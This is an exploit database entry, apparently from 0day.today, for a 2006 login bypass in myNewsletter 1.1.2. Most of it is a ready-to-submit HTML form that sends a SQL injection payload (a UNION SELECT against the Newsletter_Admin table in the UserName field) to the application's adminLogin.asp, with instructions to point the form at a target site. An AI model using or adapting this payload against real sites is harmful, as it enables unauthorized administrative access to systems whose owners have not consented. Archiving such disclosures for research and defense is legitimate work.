[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

myNewsletter <= 1.1.2 (adminLogin.asp) Login Bypass Exploit

Author
FarhadKey
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-496
Category
web applications
Date add
05-06-2006
Platform
unsorted
===========================================================
myNewsletter <= 1.1.2 (adminLogin.asp) Login Bypass Exploit
===========================================================



<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
</center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp">
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
<input type="hidden" name="Password" value="1">
<center><br><input type="submit" name="Submit" value="Login"></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
</form>
</html>



#  0day.today [2024-10-05]  #